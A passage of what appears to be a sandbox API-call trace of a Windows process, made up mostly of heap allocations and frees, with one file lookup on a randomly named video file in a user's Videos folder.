(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0102.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0102.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0102.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0102.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca430 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0102.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0102.708] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0102.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0102.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0102.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0102.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0102.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0102.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0102.708] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0102.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0102.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0102.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0102.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0102.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0102.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0102.708] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\yxs3r3.mp4", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2281a0f0, ftCreationTime.dwHighDateTime=0x1d5e63a, ftLastAccessTime.dwLowDateTime=0x46c92e10, ftLastAccessTime.dwHighDateTime=0x1d5f0ee, ftLastWriteTime.dwLowDateTime=0x46c92e10, ftLastWriteTime.dwHighDateTime=0x1d5f0ee, nFileSizeHigh=0x0, nFileSizeLow=0xc29d, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="yxs3r3.mp4", cAlternateFileName="")) returned 0x41ac780 [0102.708] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0102.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0102.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0102.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0102.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0102.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0102.709] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0102.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0102.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28a0 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0102.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0102.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0102.709] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0102.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0102.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0102.710] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0102.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0102.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2820 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0102.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2840 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28f0 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0102.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0102.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0102.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0102.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0102.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0102.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0102.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0102.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0102.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0102.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0102.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0102.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0102.712] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0102.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0102.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0102.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0102.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0102.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0102.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0102.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0102.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0102.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0102.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0102.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0102.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0102.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0102.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0102.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0102.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0102.715] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0102.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0102.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0102.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0102.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0102.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0102.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0102.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0102.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0102.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0102.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0102.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0102.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0102.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0102.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0102.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0102.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0102.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0102.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0102.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0102.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0102.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0102.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0102.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0102.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0102.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 